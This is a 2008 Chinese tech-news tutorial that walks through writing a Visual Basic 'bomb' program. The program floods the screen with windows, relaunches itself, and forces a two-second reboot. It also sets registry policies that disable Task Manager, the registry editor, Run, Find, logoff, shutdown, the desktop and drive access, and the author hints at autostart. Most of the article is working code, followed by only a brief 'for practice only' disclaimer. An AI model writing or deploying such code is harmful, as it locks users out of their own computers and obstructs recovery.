新闻 手机 家电 数码 电脑 财经 大模型 直播

知已知彼 看黑客怎么编写强力蓝屏炸弹

  • 来源: 驱动中国 作者: xuqingzhong   2008-06-27/15:10



    • 一、弹要实现的功能

    既然是炸弹,那当然要写的厉害些,首先就要像很久以前那个网页炸弹一样,弹出无数个窗口,这个功能是给别人打马虎眼的,让他一心想着去阻止炸弹继续的弹出窗口;第二个功能是专门针对windows XP而做的,当然也是在2004年第12期黑防杂志上看到的---自动重启计算机(如图1),

    那么下一项就是让每一个人都感到郁闷的事---修改注册表。我今天教大家写的炸弹实现的功能大部分还是靠注册表,主要的功能还是要禁止中招的人打开任务管理器,禁止使用注册表,隐藏桌面所有图标,禁止使用开始菜单里面的运行,搜索,关机,屏蔽ctrl+alt+del里的内容,禁止使用IE浏览器里的所有属性,屏蔽C盘,D盘等盘,这样的结果看上去一定很可怕,如果我们屏蔽右键或者加那么一点点的代码设成开机自动运行,那后果会是什么样的就可想而知了吧?

    二、代码实现

    下面让我们打开VB编译器,在窗体上面加3个timer控件,然后Interval属性设得尽量小点,该属性1000为1秒,我的设成了6,这样在一秒就会谈出上百个窗口了。
    实现代码如下:

    Private Sub Timer1_Timer()
    Dim a As New Form1    ‘声明以后出现a就是代表Form1
    a.Show                ‘Form1弹出
    End Sub

    Private Sub Timer2_Timer()
    Shell App.EXEName    ‘运行这个软件的本身
    End Sub
    然后隐藏窗体本身,书县代码如下:

    Private Sub Form_Load()
    Me.Hide
    End Sub

    那么在XP里自动关机是怎么回事呢?这个就是一个命令就能搞定的(shutdown /r /t 2),就是说,重新启动计算机的倒计时是2秒,这样中招的人就没有办法停止我们的shutdown了,其实到这里就可以算是一个有趣的恶作剧了。实现代码如下:

    Private Sub Timer3_Timer()
    Shell ("cmd.exe /c shutdown /r /t 2")  ‘调用cmd 然后在cmd里输入shutdown /r /t 2就是说设倒计时时间限制为2秒
    End Sub

    下面说说修改注册表吧,既然要修改注册表,那我们怎么能不调用API呢?当然,曾经在电脑报里也有说不用API就能读写注册表的,但是我想还是让大家用API吧,毕竟API接触多了是件好事。那么就让我来教大家条用API来简便的修改注册表吧,我们先来建一个模块,在里面加入代码:
     
    Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long ‘这是调用API函数来关闭注册表
    Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, ByVal lpSecurityAttributes As Long, phkResult As Long, lpdwDisposition As Long) As Long  ‘这是调用AP函数在注册表里创建一个键
    Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long    ‘这是调用api函数打开注册表
    Declare Function RegQueryValueExString Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long  
    Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As Long) As Long
    Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long, lpcbData As Long) As Long
    Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long  ‘调用API来设置注册表里的键名
    Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long
    Private Declare Function RegDeleteKey& Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String)   ‘调用API删除注册表里的的键
    Private Declare Function RegDeleteValue& Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) ‘调用API删除注册表里的的键值#p#分页标题#e#

    API声明完了,下面我们就做相应的定义吧,实现代码如下:


    Public Function DeleteKey(lPredefinedKey As Long, sKeyName As String)
        Dim lRetVal As Long      
        Dim hKey As Long
       
        lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
        lRetVal = RegDeleteKey(lPredefinedKey, sKeyName)   
        RegCloseKey (hKey)      ‘关闭注册表
    End Function
    ‘以上是用来做删除注册表里的键的

    Public Function DeleteValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
           Dim lRetVal As Long
           Dim hKey As Long

           lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
           lRetVal = RegDeleteValue(hKey, sValueName)
           RegCloseKey (hKey)
    End Function
    ‘以上是用来删除键值的
    Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As Long, vValue As Variant) As Long
        Dim lValue As Long
        Dim sValue As String

        Select Case lType
            Case REG_SZ
                sValue = vValue
                SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue, Len(sValue)) ‘这里是说明将键设成REG_SZ时就是字符串
            Case REG_DWORD
                lValue = vValue
    SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4)
    ‘如果将键设成REG_DWORD就是长整型
            End Select

    End Function
    ‘以上是用来定义设置键的
    Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, vValue As Variant) As Long
        Dim cch As Long
        Dim lrc As Long
        Dim lType As Long
        Dim lValue As Long
        Dim sValue As String

        On Error GoTo QueryValueExError

        lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch)
        If lrc <> ERROR_NONE Then Error 5

        Select Case lType
            Case REG_SZ:
                sValue = String(cch, 0)
                lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch)
                If lrc = ERROR_NONE Then
                    vValue = Left$(sValue, cch)
                Else
                    vValue = Empty
                End If
    ‘如果键是REG_SZ那么键值就是字符型
            Case REG_DWORD:
                lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch)
    If lrc = ERROR_NONE Then vValue = lValue       
     Case Else
                lrc = -1  
    ‘如果键是REG_DWORD那么键值就是长整型

        End Select

    QueryValueExExit:

        QueryValueEx = lrc
        Exit Function

    QueryValueExError:

        Resume QueryValueExExit

    End Function
    ‘以上是用来设置注册表键值的
    Public Function CreateNewKey(lPredefinedKey As Long, sNewKeyName As String)#p#分页标题#e#
        Dim hNewKey As Long
        Dim lRetVal As Long
       
        lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal)
        RegCloseKey (hNewKey)
    End Function
    ‘以上是用来创建一个新的键的
    Public Function SetKeyValue(lPredefinedKey As Long, sKeyName As String, sValueName As String, vValueSetting As Variant, lValueType As Long)
           Dim lRetVal As Long
           Dim hKey As Long

           lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
           lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting)
           RegCloseKey (hKey)

    End Function

    Public Function QueryValue(lPredefinedKey As Long, sKeyName As String, sValueName As String)
           Dim lRetVal As Long
           Dim hKey As Long
           Dim vValue As Variant


           lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
           lRetVal = QueryValueEx(hKey, sValueName, vValue)
           QueryValue = vValue
           RegCloseKey (hKey)
    End Function
    ‘以上是用来设置新键的键值的

    到这里,所有的模块里的代码就写完了,如果想得到更详细的代码请查看光盘中相关栏目里的代码吧!

    然后介绍一下我们怎么去给注册表加键和键值吧,具体代码如下:

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", " NoRun ", "1", REG_DWORD
    以上是在HKEY_CURRENT_USER,
    "Software/Microsoft/Windows/CurrentVersion/Policies/Explorer里面加上一个键并设置键值为1的REG_DWORD格式,这个是用来屏蔽开始菜单里的运行的,
        

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoFind", "1", REG_DWORD
    这段代码是用来屏蔽查找的,就是说在你的计算机的开始菜单里会找不到这一项,

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoLogOff", "1", REG_DWORD
    这段是用来屏蔽注销的

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoClose", "1", REG_DWORD
    这段是用来屏蔽关闭计算机的

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System", "DisableTaskMgr", "1", REG_DWORD
    这段是用来屏蔽任务管理器的

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System", "DisableRegistryTools", "1", REG_DWORD
    这段是用来禁止使用注册表的

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", " NoDesktop ", "1", REG_DWORD
    这段是用来隐藏桌面的

    CreateNewKeyHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer"
    SetKeyValueHKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/Explorer", "NoDrives", "1", REG_DWORD
    这段是用来屏蔽A盘的,键值1代表A盘,2代表B盘,4代表C盘,8代表D盘,就是说二倍二倍的下去代表下一个盘。

    如果想作出厉害一点的炸弹,最好多多的了解如何使用API函数和注册表,如果想得到更详细的源代码就在杂志相关栏目里面能够找到,这样,一个小巧而又厉害的炸弹就诞生了,希望大家仅仅是用这个东西来练习,而不是去作坏事。我写完了炸弹后,又写了一个针对这个炸弹的还原的工具收集在光盘里面了。#p#分页标题#e#


    评论 {{userinfo.comments}}

    查看全部评论
    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    AGI时代,AI软着陆的新范式注定属于更多的企业
    标签: 大模型 AI 2024-05-17
    AGI时代,AI软着陆的新范式注定属于更多的企业

    货拉拉也下场了!你真知道放贷究竟能有多赚钱吗?

    标签: 货拉拉 2024-05-17
    货拉拉也下场了!你真知道放贷究竟能有多赚钱吗?

    手机市场惨烈一季度,谁是“第一”?
    标签: 手机 华为 小米 2024-05-17
    手机市场惨烈一季度,谁是“第一”?

    美团外卖新业务“拼好饭”日订单量近500万,市场潜力巨大
    标签: 美团 拼好饭 2024-05-17
    美团外卖新业务“拼好饭”日订单量近500万,市场潜力巨大

    荣耀研发管理部总裁邓斌因严重违规被开除

    标签: 荣耀 2024-05-17
    荣耀研发管理部总裁邓斌因严重违规被开除

    驱动号 更多

    联系电话:010-62681584

    电子邮箱:sw@qudong.com

    地址:北京市海淀区学院路30号

    驱动中国官方微信

    驱动中国官方微信

    ©驱动中国 Qudong.com  All Rights Reserved 版权所有 复制必究 京ICP备11013097号广播电视节目许可证:(京)字第07618号